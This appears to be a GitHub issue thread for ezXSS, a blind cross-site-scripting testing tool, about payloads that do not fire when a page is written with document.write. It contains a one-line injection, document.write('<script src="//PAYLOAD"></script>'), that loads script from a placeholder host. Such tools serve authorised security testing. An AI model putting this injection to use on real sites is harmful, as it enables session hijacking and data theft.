Comments (5)
ssl
commented on June 9, 2024
Hey @Geluchat,
Thanks for this. Do you maybe have an example of a website where this is not triggered?
Do you mean that some sites never trigger it, or do you mean that the page might be closed before being completely loaded? Or is there some kind or error involved that the page is not 'loaded'?
Hope to hear from you.
from ezxss.
ssl
commented on June 9, 2024
Because it might be even better to change "complete" to "loading" or "interactive". But it needs some debugging.
from ezxss.
Geluchat
commented on June 9, 2024
Hello,
To illustrate, when a website utilizes document.write(XSS), the document remains in a loaded state. The MDN documentation provides insight into this concern. You can refer to the relevant section here: MDN's Document.write. To quote: "document.write() writes to the document stream, and invoking document.write() on an already loaded document implicitly triggers document.open(), resulting in the clearing of the document."
Below is a code snippet that demonstrates the issue:
document.write('<script src="//PAYLOAD"></script>')Best regards,
from ezxss.
ssl
commented on June 9, 2024
Thanks! I will look into this, do some debugging and will fix accordantly.
from ezxss.
ssl
commented on June 9, 2024
Fixed in d06f862
from ezxss.
Related Issues (20)
- Feature Request: Add GPG encryption of callback data with OpenPGP.js HOT 3
- screenshot HOT 2
- Add ability to block all subdomains by adding root domain to block list HOT 4
- Broken copy cookies as JSON HOT 2
- Docker Install SQL Error HOT 5
- Out-of-the-box docker installation has broken HTTPS interface (ssl error) HOT 6
- Limit the amount of disclosed information in alerts HOT 1
- Screenshots don't work while using import() function HOT 3
- Please include the "forget password" and "delete account" features in the application. HOT 1
- Error updating from 4.x to 4.2 HOT 12
- DataTables warning: table id=reports - Ajax error HOT 2
- Bug: Duplicate report setting isn't respected by Discord setting HOT 4
- Updating from 4.1 to 4.2 catches 500 error on update page HOT 7
- Feature Request : Cleaner UI HOT 4
- List of issues when updated to v4.2 HOT 2
- Recovering
- Issue with some payloads HOT 5
- Cookies not shown in generated reports HOT 2
- [FR] OICD Login
- MySQL docker deceprecated command HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ezxss.